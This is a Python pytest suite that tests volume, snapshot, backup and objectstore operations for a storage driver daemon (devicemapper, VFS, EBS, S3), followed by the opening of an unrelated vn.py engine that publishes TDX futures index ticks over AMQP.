        success = bool(success and DM in info["General"]["DriverList"])
        success = bool(success and VFS in info["General"]["DriverList"])
        success = bool(success and info["General"]["Root"] == CFG_ROOT)
        success = bool(success and info["General"]["DefaultDriver"] == DM)
        success = bool(success and info[DM]["Driver"] == "devicemapper")
        success = bool(success and info[DM]["Root"] == DM_ROOT)
        success = bool(success and info[DM]["DataDevice"] == data_dev)
        success = bool(success and info[DM]["MetadataDevice"] == metadata_dev)
        success = bool(success and info[DM]["ThinpoolDevice"] == os.path.join(DM_DIR, POOL_NAME))
        success = bool(success and info[DM]["ThinpoolSize"] == str(DATA_DEVICE_SIZE))
        success = bool(success and info[DM]["ThinpoolBlockSize"] == str(DM_BLOCK_SIZE))
        success = bool(success and info[DM]["DefaultVolumeSize"] == DEFAULT_VOLUME_SIZE)
        success = bool(success and info[VFS]["Root"] == VFS_ROOT)
        success = bool(success and info[VFS]["Path"] == VFS_VOLUME_PATH)
        if test_ebs:
            success = bool(success and info[EBS]["DefaultVolumeSize"] == DEFAULT_VOLUME_SIZE)
            success = bool(success and info[EBS]["DefaultVolumeType"] == EBS_DEFAULT_VOLUME_TYPE)
    except:
        # Missing keys mean a malformed info response — treat as failure
        success = False
    if not success:
        teardown_module()
        assert False
@pytest.yield_fixture(autouse=True)
def cleanup_test():
    # Autouse fixture: after every test, delete any volumes the test
    # registered, and fail the test if volume config files leaked into
    # CFG_ROOT (i.e. the test forgot to delete a volume).
    yield
    filenames = os.listdir(CFG_ROOT)
    leftover_volumes = []
    for filename in filenames:
        if filename.startswith('volume'):
            leftover_volumes.append(filename)
    while volume_cleanup_list:
        v = volume_cleanup_list.pop()
        try:
            delete_volume(v)
        except:
            print "Failed to delete volume ", v
    if len(leftover_volumes) != 0:
        print leftover_volumes
        assert False
def create_volume(size = "", name = "", backup = "", driver = "",
                  volume_id = "", volume_type = "", iops = "", forvm = False):
    # Create a volume through the daemon and register it for cleanup.
    name = v.create_volume(size, name, backup, driver,
                           volume_id, volume_type, iops, forvm)
    # Devicemapper volumes (the default driver) also need dmsetup cleanup
    if driver in ("", DM):
        dm_cleanup_list.append(name)
    volume_cleanup_list.append(name)
    return name
def delete_volume(name, ref_only = False):
    # Delete a volume and unregister it from the cleanup lists.
    v.delete_volume(name, ref_only)
    # Non-DM volumes were never added to dm_cleanup_list
    if name in dm_cleanup_list:
        dm_cleanup_list.remove(name)
    volume_cleanup_list.remove(name)
def mount_volume_with_path(name):
    # Mount at a caller-specified path and register it for cleanup.
    mountpoint = v.mount_volume_with_path(name)
    mount_cleanup_list.append(mountpoint)
    return mountpoint
def mount_volume(name):
    # Auto-mount the volume and register the mountpoint for cleanup.
    mountpoint = v.mount_volume(name)
    mount_cleanup_list.append(mountpoint)
    return mountpoint
def umount_volume(name, mount_dir):
    # Unmount the volume and drop the mountpoint from the teardown list.
    v.umount_volume(name)
    mount_cleanup_list.remove(mount_dir)
def test_volume_crud():
    # DM supports sizes but not VM images here; VFS is the opposite.
    volume_crud_test(DM, vmTest = False)
    volume_crud_test(VFS, sizeTest = False)
def volume_crud_test(drv, sizeTest = True, vmTest = True):
    # Basic create/delete cycle for a driver, optionally exercising
    # explicit sizes and VM-image volumes.
    first = create_volume(driver=drv)
    second = create_volume(driver=drv)
    if sizeTest:
        big = create_volume(VOLUME_SIZE_BIG, driver = drv)
        small = create_volume(VOLUME_SIZE_SMALL, driver = drv)
        delete_volume(small)
        delete_volume(big)
    if vmTest:
        vm_one = create_volume(driver = drv, forvm = True)
        vm_two = create_volume(driver = drv, forvm = True)
        delete_volume(vm_two)
        delete_volume(vm_one)
    delete_volume(second)
    delete_volume(first)
@pytest.mark.skipif(not pytest.config.getoption("ebs"),
                    reason="--ebs was not specified")
def test_ebs_volume_crud():
    # Exercises EBS volume types (standard/gp2/io1) and re-creating a
    # convoy volume from an existing EBS volume id.
    plain = create_volume(driver=EBS)
    gp2_vol = create_volume(size=VOLUME_SIZE_SMALL, driver=EBS, volume_type="gp2")
    io1_vol = create_volume(size=VOLUME_SIZE_IOPS, driver=EBS, volume_type="io1",
                            iops="100")
    io1_info = v.inspect_volume(io1_vol)
    backing_ebs_id = io1_info["DriverInfo"]["EBSVolumeID"]
    # Drop only the convoy reference, then re-adopt the same EBS volume
    delete_volume(io1_vol, ref_only = True)
    io1_vol = create_volume(driver=EBS, volume_id=backing_ebs_id)
    delete_volume(io1_vol)
    delete_volume(gp2_vol)
    delete_volume(plain)
def test_vfs_delete_volume_ref_only():
    # A ref-only delete must leave the VFS backing directory (and its
    # files) on disk.
    name = create_volume(driver=VFS)
    insp = v.inspect_volume(name)
    path = insp["DriverInfo"]["Path"]
    assert os.path.exists(path)
    filename = "testfile"
    test_file = os.path.join(path,filename)
    with open(test_file, "w") as f:
        subprocess.check_call(["echo", "This is volume test file"], stdout=f)
    assert os.path.exists(test_file)
    delete_volume(name, ref_only = True)
    assert os.path.exists(test_file)
    os.remove(test_file)
def test_volume_name():
    # Named-volume behavior should be driver-independent.
    volume_name_test(DM)
    volume_name_test(VFS)
def volume_name_test(drv):
    # Verify named creation, duplicate-name rejection, unknown-driver
    # rejection, and that names are reusable after deletion.
    vol_name1 = "vol.1_1-0"
    vol_name2 = "vol.2_2-0"
    vol = create_volume(name=vol_name1, driver=drv)
    vols = v.list_volumes()
    assert vols[vol]["Name"] == vol_name1
    assert vols[vol]["Driver"] == drv
    assert vols[vol]["CreatedTime"] != ""
    # Creating the same name twice, or with a bogus driver, must fail
    with pytest.raises(subprocess.CalledProcessError):
        new_name = create_volume(name=vol_name1, driver=drv)
    with pytest.raises(subprocess.CalledProcessError):
        new_name = create_volume(driver="randomdriver")
    delete_volume(vol_name1)
    vols = v.list_volumes()
    assert vol not in vols
    # The freed name can be used again
    vol1 = create_volume(name=vol_name1, driver=drv)
    vol2 = create_volume(name=vol_name2, driver=drv)
    vols = v.list_volumes()
    assert vols[vol1]["Name"] == vol_name1
    assert vols[vol2]["Name"] == vol_name2
    assert vols[vol1]["CreatedTime"] != ""
    assert vols[vol2]["CreatedTime"] != ""
    delete_volume(vol1)
    delete_volume(vol_name2)
def mount_volume_and_create_file(name, filename):
    # with format
    mountpoint = mount_volume(name)
    test_file = os.path.join(mountpoint,filename)
    with open(test_file, "w") as f:
        subprocess.check_call(["echo", "This is volume test file"], stdout=f)
    assert os.path.exists(test_file)
    umount_volume(name, mountpoint)
    # Doesn't work with current VFS implmentation, since it won't really mount
    #assert not os.path.exists(test_file)
def test_volume_mount():
    volume_mount_test(DM)
    if test_ebs:
        volume_mount_test(EBS)

# skip the vfs mount test because we only pass the original volume path as
# mount path, not really done any mount work now
def volume_mount_test(drv):
    """A file written through one mount must survive re-mounts of the volume."""
    vol = create_volume(driver=drv)
    # with format
    filename = "test"
    mount_volume_and_create_file(vol, filename)
    # without format
    volume_mount_dir = mount_volume_with_path(vol)
    test_file = os.path.join(volume_mount_dir, filename)
    assert os.path.exists(test_file)
    umount_volume(vol, volume_mount_dir)
    assert not os.path.exists(test_file)
    # auto mount
    volume_mount_dir = mount_volume(vol)
    test_file = os.path.join(volume_mount_dir, filename)
    assert os.path.exists(test_file)
    umount_volume(vol, volume_mount_dir)
    assert not os.path.exists(test_file)
    delete_volume(vol)
def test_volume_vm_mount():
    """VM-image volume layout check (VFS driver only)."""
    volume_vm_test(VFS)
def volume_vm_test(drv):
    """A forvm volume must expose a VM image file of exactly the volume size."""
    vol = create_volume(driver = drv, size = VOLUME_SIZE_SMALL, forvm = True)
    mount_dir = mount_volume(vol)
    image_filepath = os.path.join(mount_dir, VM_IMAGE_FILE)
    assert os.path.exists(image_filepath)
    size = os.stat(image_filepath).st_size
    # VOLUME_SIZE_SMALL is a string, so compare the string form of the size
    assert str(size) == VOLUME_SIZE_SMALL
    umount_volume(vol, mount_dir)
    delete_volume(vol)
def test_volume_list():
    """List/inspect volumes per driver; VFS does not report sizes."""
    volume_list_driver_test(DM)
    volume_list_driver_test(VFS, False)
    if test_ebs:
        volume_list_driver_test(EBS)
def volume_list_driver_test(drv, check_size = True):
    """Create several volumes and verify list/inspect output for *drv*.

    When check_size is False (VFS) the driver reports no size, so the
    size-specific volumes and assertions are skipped.
    """
    volumes = v.list_volumes()
    assert len(volumes) == 0
    vol1 = create_volume(driver=drv)
    vol2 = create_volume(driver=drv)
    if check_size:
        vol3 = create_volume(VOLUME_SIZE_BIG, driver=drv)
        vol4 = create_volume(VOLUME_SIZE_SMALL, driver=drv)
    volume = v.inspect_volume(vol1)
    assert volume["Name"] == vol1
    if check_size:
        assert volume["DriverInfo"]["Size"] == DEFAULT_VOLUME_SIZE
    volume = v.inspect_volume(vol2)
    assert volume["Name"] == vol2
    if check_size:
        assert volume["DriverInfo"]["Size"] == DEFAULT_VOLUME_SIZE
    if check_size:
        volumes = v.list_volumes()
        assert volumes[vol1]["DriverInfo"]["Size"] == DEFAULT_VOLUME_SIZE
        assert volumes[vol2]["DriverInfo"]["Size"] == DEFAULT_VOLUME_SIZE
        assert volumes[vol3]["DriverInfo"]["Size"] == VOLUME_SIZE_BIG_Bytes
        assert volumes[vol4]["DriverInfo"]["Size"] == VOLUME_SIZE_SMALL
        # vol3/vol4 only exist when check_size is True
        delete_volume(vol4)
        delete_volume(vol3)
    delete_volume(vol2)
    delete_volume(vol1)
def test_snapshot_crud():
    """Snapshot create/delete lifecycle for the DM and VFS drivers."""
    snapshot_crud_test(DM)
    snapshot_crud_test(VFS)
def snapshot_crud_test(driver):
    """Snapshots can be deleted explicitly or reaped along with their volume."""
    volume_name = create_volume(VOLUME_SIZE_SMALL, name="vol1", driver=driver)
    snapshot = v.create_snapshot(volume_name)
    v.delete_snapshot(snapshot)
    delete_volume(volume_name)
    # delete snapshot automatically with volume
    volume_name = create_volume(VOLUME_SIZE_SMALL, name="vol1", driver=driver)
    snap1 = v.create_snapshot(volume_name)
    snap2 = v.create_snapshot(volume_name)
    snap3 = v.create_snapshot(volume_name)
    v.delete_snapshot(snap1)
    v.delete_snapshot(snap2)
    # snap3 is intentionally left behind: deleting the volume must remove it
    delete_volume(volume_name)
def test_snapshot_name():
    """Named-snapshot checks for the DM and VFS drivers."""
    snapshot_name_test(DM)
    snapshot_name_test(VFS)
def snapshot_name_test(driver):
    """A snapshot keeps its user-supplied name; duplicate names are rejected."""
    volume_name = create_volume(VOLUME_SIZE_SMALL, driver=driver)
    snap1_name = "snap1"
    snap1 = v.create_snapshot(volume_name, name=snap1_name)
    assert snap1_name == snap1
    vols = v.list_volumes()
    s = vols[volume_name]["Snapshots"][snap1]
    assert s["Name"] == snap1_name
    assert s["DriverInfo"]["Driver"] == driver
    assert s["CreatedTime"] != ""
    # duplicate snapshot names must be rejected
    with pytest.raises(subprocess.CalledProcessError):
        new_name = v.create_snapshot(volume_name, name=snap1_name)
    v.delete_snapshot(snap1)
    delete_volume(volume_name)
def test_snapshot_list():
    """Snapshot listing checks; VFS does not report snapshot sizes."""
    snapshot_list_test(DM)
    snapshot_list_test(VFS, False)
def snapshot_list_test(driver, check_size = True):
    """Create snapshots across two volumes and verify inspect/list output."""
    volume1_name = create_volume(VOLUME_SIZE_SMALL, name = "volume1", driver=driver)
    volume2_name = create_volume(VOLUME_SIZE_BIG, driver=driver)
    # inspecting a non-existent snapshot must fail
    with pytest.raises(subprocess.CalledProcessError):
        snapshot = v.inspect_snapshot(str(uuid.uuid1()))
    with pytest.raises(subprocess.CalledProcessError):
        volume = v.inspect_snapshot(str(uuid.uuid1()))
    snap0_vol1 = v.create_snapshot(volume1_name, "snap0_vol1")
    assert snap0_vol1 == "snap0_vol1"
    snapshot = v.inspect_snapshot("snap0_vol1")
    assert snapshot["VolumeName"] == volume1_name
    if check_size:
        assert str(snapshot["DriverInfo"]["Size"]) == VOLUME_SIZE_SMALL
    assert snapshot["Name"] == "snap0_vol1"
    snap1_vol1 = v.create_snapshot(volume1_name)
    snap2_vol1 = v.create_snapshot(volume1_name)
    snap1_vol2 = v.create_snapshot(volume2_name, "snap1_vol2")
    assert snap1_vol2 == "snap1_vol2"
    snap2_vol2 = v.create_snapshot(volume2_name, "snap2_vol2")
    assert snap2_vol2 == "snap2_vol2"
    snap3_vol2 = v.create_snapshot(volume2_name, "snap3_vol2")
    assert snap3_vol2 == "snap3_vol2"
    # per-volume inspect must carry all of that volume's snapshots
    volume = v.inspect_volume(volume2_name)
    assert snap1_vol2 in volume["Snapshots"]
    assert volume["Snapshots"][snap1_vol2]["Name"] == "snap1_vol2"
    assert volume["Snapshots"][snap1_vol2]["CreatedTime"] != ""
    assert snap2_vol2 in volume["Snapshots"]
    assert volume["Snapshots"][snap2_vol2]["Name"] == "snap2_vol2"
    assert volume["Snapshots"][snap2_vol2]["CreatedTime"] != ""
    assert snap3_vol2 in volume["Snapshots"]
    assert volume["Snapshots"][snap3_vol2]["Name"] == "snap3_vol2"
    assert volume["Snapshots"][snap3_vol2]["CreatedTime"] != ""
    volumes = v.list_volumes()
    assert snap0_vol1 in volumes[volume1_name]["Snapshots"]
    assert snap1_vol1 in volumes[volume1_name]["Snapshots"]
    assert snap2_vol1 in volumes[volume1_name]["Snapshots"]
    assert snap1_vol2 in volumes[volume2_name]["Snapshots"]
    assert snap2_vol2 in volumes[volume2_name]["Snapshots"]
    assert snap3_vol2 in volumes[volume2_name]["Snapshots"]
    # a deleted snapshot must vanish from inspect
    v.delete_snapshot(snap0_vol1)
    with pytest.raises(subprocess.CalledProcessError):
        snapshot = v.inspect_snapshot(snap0_vol1)
    v.delete_snapshot(snap1_vol1)
    v.delete_snapshot(snap2_vol1)
    v.delete_snapshot(snap1_vol2)
    v.delete_snapshot(snap2_vol2)
    v.delete_snapshot(snap3_vol2)
    delete_volume(volume2_name)
    delete_volume(volume1_name)
@pytest.mark.skipif(not pytest.config.getoption("ebs"),
                    reason="--ebs was not specified")
# NOTE(review): `pytest.config` was removed in pytest 5; on modern pytest this
# skip needs to be rewritten using a conftest fixture — confirm pytest version.
def test_ebs_snapshot_backup():
    """EBS snapshot and backup metadata must mirror the source volume."""
    volume_name = create_volume(size = VOLUME_SIZE_SMALL, name = "ebs_volume", driver=EBS)
    assert volume_name == "ebs_volume"
    mount_volume_and_create_file(volume_name, "test-vol1-v1")
    snap1_name = v.create_snapshot("ebs_volume", "snap1")
    assert snap1_name == "snap1"
    volume = v.inspect_volume("ebs_volume")
    snap1 = v.inspect_snapshot("snap1")
    assert snap1["VolumeName"] == volume_name
    assert snap1["Name"] == "snap1"
    assert str(snap1["DriverInfo"]["Size"]) == VOLUME_SIZE_SMALL
    assert snap1["DriverInfo"]["EBSVolumeID"] == volume["DriverInfo"]["EBSVolumeID"]
    assert snap1["DriverInfo"]["Size"] == volume["DriverInfo"]["Size"]
    # EBS uses its implicit backup destination (no dest argument)
    backup_url = v.create_backup(snap1_name)
    backup = v.inspect_backup(backup_url)
    assert backup["EBSVolumeID"] == volume["DriverInfo"]["EBSVolumeID"]
    assert backup["EBSSnapshotID"] == snap1["DriverInfo"]["EBSSnapshotID"]
    assert backup["Size"] == snap1["DriverInfo"]["Size"]
    v.delete_backup(backup_url)
    v.delete_snapshot("snap1")
    delete_volume(volume_name)
def create_delete_volume():
    """One create-snapshot-delete cycle against the default (DM) driver."""
    vol = v.create_volume(size = VOLUME_SIZE_6M)
    snap = v.create_snapshot(vol)
    v.delete_snapshot(snap)
    v.delete_volume(vol)
# uses default driver which is device mapper
def test_create_volume_in_parallel():
    """Stress the create/delete cycle from TEST_THREAD_COUNT concurrent threads."""
    workers = []
    for _ in range(TEST_THREAD_COUNT):
        worker = threading.Thread(target=create_delete_volume)
        workers.append(worker)
        worker.start()
    for worker in workers:
        worker.join()
def test_create_volume_in_sequence():
    """Repeat the create/delete cycle TEST_LOOP_COUNT times, serially."""
    for _ in range(TEST_LOOP_COUNT):
        create_delete_volume()
def compress_volume(volume_name):
    """Mount the volume, zip its contents under TEST_ROOT, and unmount.

    Returns the path of the created .zip archive (caller must remove it).
    """
    mountpoint = mount_volume(volume_name)
    zipfile = os.path.join(TEST_ROOT, volume_name)
    shutil.make_archive(zipfile, "zip", mountpoint)
    umount_volume(volume_name, mountpoint)
    return zipfile + ".zip"
def get_volume_checksum(volume_name, driver):
    """Return the sha512 checksum of a volume's contents.

    VFS volumes are archived to a temporary zip first (their data is a
    directory tree); block drivers (DM/EBS) are hashed directly from the
    device node reported by inspect_volume.
    """
    f = ""
    if driver == VFS:
        f = compress_volume(volume_name)
    else:  # DM/EBS
        f = v.inspect_volume(volume_name)["DriverInfo"]["Device"]
    output = subprocess.check_output(["sha512sum", f]).decode()
    # BUG FIX: this compared against the literal "VFS" instead of the VFS
    # constant used everywhere else (see the branch above), so the temporary
    # archive created by compress_volume was never cleaned up.
    if driver == VFS and f != "":
        os.remove(f)
    return output.split(" ")[0]
def check_restore(origin_vol, restored_vol, driver):
    """A restored volume must hash identically to its origin."""
    original = get_volume_checksum(origin_vol, driver)
    restored = get_volume_checksum(restored_vol, driver)
    assert original == restored
def test_backup_create_restore_only():
    """Restore from backup after the source volume has been removed."""
    process_restore_with_original_removed(VFS, VFS_DEST)
    process_restore_with_original_removed(DM, VFS_DEST)
    if test_ebs:
        # EBS uses its own implicit backup destination
        process_restore_with_original_removed(EBS)
def process_restore_with_original_removed(driver, dest = ""):
    """Back up a volume, delete it, restore from the backup, compare checksums."""
    volume1_name = create_volume(size = VOLUME_SIZE_BIG, driver = driver)
    mount_volume_and_create_file(volume1_name, "test-vol1-v1")
    snap1_vol1_name = v.create_snapshot(volume1_name)
    bak = v.create_backup(snap1_vol1_name, dest)
    volume1_checksum = get_volume_checksum(volume1_name, driver)
    delete_volume(volume1_name)
    if driver == DM:
        #cannot specify different size with backup
        with pytest.raises(subprocess.CalledProcessError):
            res_volume1_name = create_volume(VOLUME_SIZE_SMALL, "res-vol1", bak,
                                             driver = driver)
    res_volume1_name = create_volume(name = "res-vol1", backup = bak, driver =
                                     driver)
    res_volume1_checksum = get_volume_checksum(res_volume1_name, driver)
    assert res_volume1_checksum == volume1_checksum
    delete_volume(res_volume1_name)
    v.delete_backup(bak)
def test_duplicate_backup():
    """Two backups of the same snapshot must be independently restorable."""
    process_duplicate_backup_test(VFS_DEST, VFS)
    process_duplicate_backup_test(VFS_DEST, DM)
def process_duplicate_backup_test(dest, driver):
    """Deleting one of two duplicate backups must not corrupt the other."""
    volume_name = create_volume(size = VOLUME_SIZE_BIG, driver = driver)
    mount_volume_and_create_file(volume_name, "volume_snap_test")
    snap_name = v.create_snapshot(volume_name)
    volume_checksum = get_volume_checksum(volume_name, driver)
    bak1 = v.create_backup(snap_name, dest)
    bak2 = v.create_backup(snap_name, dest)
    # restore from the second backup, then delete that backup
    res2 = create_volume(backup = bak2, driver = driver)
    res2_checksum = get_volume_checksum(res2, driver = driver)
    assert res2_checksum == volume_checksum
    v.delete_backup(bak2)
    # the first backup must still restore correctly
    res1 = create_volume(backup = bak1, driver = driver)
    res1_checksum = get_volume_checksum(res1, driver = driver)
    assert res1_checksum == volume_checksum
    v.delete_backup(bak1)
    delete_volume(res2)
    delete_volume(res1)
    delete_volume(volume_name)
def test_vfs_objectstore():
    """Full objectstore workflow against a local VFS destination."""
    vfs_objectstore_test(VFS)
    vfs_objectstore_test(DM)
def vfs_objectstore_test(driver):
    """Run the shared objectstore scenario with the VFS destination."""
    process_objectstore_test(VFS_DEST, driver)
@pytest.mark.skipif(not pytest.config.getoption("s3"),
                    reason="--s3 was not specified")
# NOTE(review): `pytest.config` was removed in pytest 5; on modern pytest this
# skip needs to be rewritten using a conftest fixture — confirm pytest version.
def test_s3_objectstore():
    """Objectstore workflow against S3 (requires --s3)."""
    s3_objectstore_test(VFS)
    s3_objectstore_test(DM)
def s3_objectstore_test(driver):
    """Run the objectstore scenario at the bucket root and under a sub-path."""
    process_objectstore_test(get_s3_dest(), driver)
    process_objectstore_test(get_s3_dest(S3_PATH), driver)
def get_s3_dest(path = ""):
    """Build an "s3://bucket@region/path" destination URL from the test env vars."""
    region = os.environ[ENV_TEST_AWS_REGION]
    bucket = os.environ[ENV_TEST_AWS_BUCKET]
    return "s3://{}@{}/{}".format(bucket, region, path)
def unescape_url(url):
    """Undo JSON escaping of '&' in backup URLs ("\\u0026" and stray "u0026")."""
    for escaped in ("\\u0026", "u0026"):
        url = url.replace(escaped, "&")
    return url
def process_objectstore_test(dest, driver):
    """End-to-end objectstore scenario for *driver* against destination *dest*.

    Backs up snapshots of two volumes, verifies list/inspect metadata,
    restores from the backups, then removes everything.
    """
    #make sure objectstore is empty
    backups = v.list_backup(dest)
    assert len(backups) == 0
    #add volume to objectstore
    name1 = "volume1_" + str(uuid.uuid1())[:8]
    name2 = "volume2_" + str(uuid.uuid1())[:8]
    volume1_name = create_volume(VOLUME_SIZE_BIG, name1, driver=driver)
    volume1 = v.inspect_volume(name1)
    volume2_name = create_volume(VOLUME_SIZE_SMALL, name2, driver=driver)
    # listing backups for a volume that has none must fail
    with pytest.raises(subprocess.CalledProcessError):
        backups = v.list_backup(dest, volume1_name)
    #first snapshots
    snap1_vol1_name = v.create_snapshot(volume1_name, "snap1_vol1")
    snap1_vol1 = v.inspect_snapshot("snap1_vol1")
    snap1_vol1_bak = v.create_backup("snap1_vol1", dest)
    backups = v.list_backup(dest, volume1_name)
    assert len(backups) == 1
    # backup URLs come back JSON-escaped; normalise before using as dict key
    backup = backups[unescape_url(snap1_vol1_bak)]
    assert backup["DriverName"] == driver
    assert backup["VolumeName"] == volume1["Name"]
    if "Size" in volume1["DriverInfo"]:
        assert backup["VolumeSize"] == volume1["DriverInfo"]["Size"]
    assert backup["VolumeCreatedAt"] == volume1["CreatedTime"]
    assert backup["SnapshotName"] == snap1_vol1["Name"]
    assert backup["SnapshotCreatedAt"] == snap1_vol1["CreatedTime"]
    assert backup["CreatedTime"] != ""
    # inspect_backup must agree with list_backup
    backup = v.inspect_backup(snap1_vol1_bak)
    assert backup["DriverName"] == driver
    assert backup["VolumeName"] == volume1["Name"]
    if "Size" in volume1["DriverInfo"]:
        assert backup["VolumeSize"] == volume1["DriverInfo"]["Size"]
    assert backup["VolumeCreatedAt"] == volume1["CreatedTime"]
    assert backup["SnapshotName"] == snap1_vol1["Name"]
    assert backup["SnapshotCreatedAt"] == snap1_vol1["CreatedTime"]
    assert backup["CreatedTime"] != ""
    snap1_vol2_name = v.create_snapshot(volume2_name, "snap1_vol2")
    snap1_vol2_bak = v.create_backup("snap1_vol2", dest)
    #list snapshots
    backups = v.list_backup(dest, volume2_name)
    assert len(backups) == 1
    backup = v.inspect_backup(snap1_vol2_bak)
    assert backup["VolumeName"] == volume2_name
    assert backup["SnapshotName"] == snap1_vol2_name
    #second snapshots
    mount_volume_and_create_file(volume1_name, "test-vol1-v1")
    snap2_vol1_name = v.create_snapshot(volume1_name)
    snap2_vol1_bak = v.create_backup(snap2_vol1_name, dest)
    mount_volume_and_create_file(volume2_name, "test-vol2-v2")
    snap2_vol2_name = v.create_snapshot(volume2_name)
    snap2_vol2_bak = v.create_backup(snap2_vol2_name, dest)
    #list snapshots again
    backups = v.list_backup(dest)
    assert len(backups) == 4
    assert backups[unescape_url(snap1_vol1_bak)]["DriverName"] == driver
    assert backups[unescape_url(snap1_vol1_bak)]["VolumeName"] == volume1_name
    assert backups[unescape_url(snap1_vol1_bak)]["SnapshotName"] == snap1_vol1_name
    assert backups[unescape_url(snap2_vol1_bak)]["DriverName"] == driver
    assert backups[unescape_url(snap2_vol1_bak)]["VolumeName"] == volume1_name
    assert backups[unescape_url(snap2_vol1_bak)]["SnapshotName"] == snap2_vol1_name
    assert backups[unescape_url(snap1_vol2_bak)]["DriverName"] == driver
    assert backups[unescape_url(snap1_vol2_bak)]["VolumeName"] == volume2_name
    assert backups[unescape_url(snap1_vol2_bak)]["SnapshotName"] == snap1_vol2_name
    assert backups[unescape_url(snap2_vol2_bak)]["DriverName"] == driver
    assert backups[unescape_url(snap2_vol2_bak)]["VolumeName"] == volume2_name
    assert backups[unescape_url(snap2_vol2_bak)]["SnapshotName"] == snap2_vol2_name
    # per-volume filtering
    backups = v.list_backup(dest, volume1_name)
    assert len(backups) == 2
    assert backups[unescape_url(snap1_vol1_bak)]["VolumeName"] == volume1_name
    assert backups[unescape_url(snap1_vol1_bak)]["SnapshotName"] == snap1_vol1_name
    assert backups[unescape_url(snap2_vol1_bak)]["VolumeName"] == volume1_name
    assert backups[unescape_url(snap2_vol1_bak)]["SnapshotName"] == snap2_vol1_name
    backups = v.list_backup(dest, volume2_name)
    assert len(backups) == 2
    assert backups[unescape_url(snap1_vol2_bak)]["VolumeName"] == volume2_name
    assert backups[unescape_url(snap1_vol2_bak)]["SnapshotName"] == snap1_vol2_name
    assert backups[unescape_url(snap2_vol2_bak)]["VolumeName"] == volume2_name
    assert backups[unescape_url(snap2_vol2_bak)]["SnapshotName"] == snap2_vol2_name
    #restore snapshot
    res_volume1_name = create_volume(name = "res-vol1", backup = snap2_vol1_bak,
                                     driver=driver)
    check_restore(volume1_name, res_volume1_name, driver)
    res_volume2_name = create_volume(backup = snap2_vol2_bak, driver=driver)
    check_restore(volume2_name, res_volume2_name, driver)
    #remove snapshots from objectstore
    v.delete_backup(snap2_vol1_bak)
    v.delete_backup(snap2_vol2_bak)
    #list snapshots again
    backups = v.list_backup(dest)
    assert len(backups) == 2
    assert backups[unescape_url(snap1_vol1_bak)]["DriverName"] == driver
    assert backups[unescape_url(snap1_vol1_bak)]["VolumeName"] == volume1_name
    assert backups[unescape_url(snap1_vol1_bak)]["SnapshotName"] == snap1_vol1_name
    assert backups[unescape_url(snap1_vol2_bak)]["DriverName"] == driver
    assert backups[unescape_url(snap1_vol2_bak)]["VolumeName"] == volume2_name
    assert backups[unescape_url(snap1_vol2_bak)]["SnapshotName"] == snap1_vol2_name
    backups = v.list_backup(dest, volume1_name)
    assert len(backups) == 1
    backup = backups[unescape_url(snap1_vol1_bak)]
    assert backup["DriverName"] == driver
    assert backup["VolumeName"] == volume1_name
    assert backup["SnapshotName"] == snap1_vol1_name
    backup = v.inspect_backup(snap1_vol1_bak)
    assert backup["DriverName"] == driver
    assert backup["VolumeName"] == volume1_name
    assert backup["SnapshotName"] == snap1_vol1_name
    backups = v.list_backup(dest, volume2_name)
    assert len(backups) == 1
    backup = backups[unescape_url(snap1_vol2_bak)]
    assert backup["DriverName"] == driver
    assert backup["VolumeName"] == volume2_name
    assert backup["SnapshotName"] == snap1_vol2_name
    backup = v.inspect_backup(snap1_vol2_bak)
    assert backup["DriverName"] == driver
    assert backup["VolumeName"] == volume2_name
    assert backup["SnapshotName"] == snap1_vol2_name
    #remove snapshots from objectstore
    v.delete_backup(snap1_vol2_bak)
    v.delete_backup(snap1_vol1_bak)
    v.delete_snapshot(snap1_vol1_name)
    v.delete_snapshot(snap2_vol1_name)
    v.delete_snapshot(snap1_vol2_name)
    v.delete_snapshot(snap2_vol2_name)
    delete_volume(volume1_name)
    delete_volume(volume2_name)
    delete_volume(res_volume1_name)
    delete_volume(res_volume2_name)
def test_cross_restore_error_checking():
    """A backup made by one driver cannot be restored with another driver."""
    vfs_vol_name = create_volume(driver=VFS)
    vfs_snap_name = v.create_snapshot(vfs_vol_name)
    vfs_backup = v.create_backup(vfs_snap_name, VFS_DEST)
    dm_vol_name = create_volume(size = VOLUME_SIZE_SMALL, driver=DM)
    dm_snap_name = v.create_snapshot(dm_vol_name)
    dm_backup = v.create_backup(dm_snap_name, VFS_DEST)
    # cross-driver restores must fail
    with pytest.raises(subprocess.CalledProcessError):
        create_volume(driver=VFS, backup=dm_backup)
    with pytest.raises(subprocess.CalledProcessError):
        create_volume(driver=DM, backup=vfs_backup)
    # same-driver restores must succeed
    vfs_res = create_volume(driver=VFS, backup=vfs_backup)
    dm_res = create_volume(driver=DM, backup=dm_backup)
    delete_volume(vfs_vol_name)
    delete_volume(vfs_res)
    delete_volume(dm_vol_name)
    delete_volume(dm_res)
|
engine.py | # encoding: UTF-8
# 通达信指数行情发布器
# 华富资产
import copy
import json
import traceback
from threading import Thread
from datetime import datetime, timedelta
from time import sleep
from logging import ERROR
from pytdx.exhq import TdxExHq_API
from vnpy.event import EventEngine
from vnpy.trader.constant import Exchange
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.event import EVENT_TIMER
from vnpy.trader.object import TickData
from vnpy.trader.utility import get_trading_date
from vnpy.data.tdx.tdx_common import TDX_FUTURE_HOSTS
from vnpy.app.cta_strategy_pro.base import (
NIGHT_MARKET_23,
NIGHT_MARKET_SQ2,
MARKET_DAY_ONLY)
from vnpy.amqp.producer import publisher
APP_NAME = 'INDEXDATAPUBLISHER'
class IndexTickPublisher(BaseEngine):
    """Index tick publishing service.

    Polls futures index quotes from a TDX (通达信) market-data server via
    pytdx and publishes each tick to RabbitMQ as a JSON message.
    """

    # ----------------------------------------------------------------------
    def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
        """Set up state only; no network connection is made here (see connect())."""
        super(IndexTickPublisher, self).__init__(
            main_engine, event_engine, APP_NAME)

        self.main_engine = main_engine
        self.event_engine = event_engine
        self.create_logger(logger_name=APP_NAME)

        self.last_minute = None          # minute of the last processed timer event

        self.registerEvent()

        self.req_interval = 0.5          # delay between quote polls (seconds)
        self.req_id = 0                  # request sequence number
        self.connection_status = False   # True once a TDX session is live

        self.symbol_exchange_dict = {}   # tdx symbol -> vn.py Exchange
        self.symbol_market_dict = {}     # tdx symbol -> tdx market id
        self.symbol_tick_dict = {}       # vn symbol -> last published TickData
        # self.queue = Queue()           # request queue (unused)
        self.pool = None                 # thread pool (unused)
        self.req_thread = None           # polling thread started by connect()

        self.ip_list = TDX_FUTURE_HOSTS

        # tdx api
        self.fail_ip_dict = {}           # "ip:port" -> cool-down counter (minutes)
        self.best_ip = None
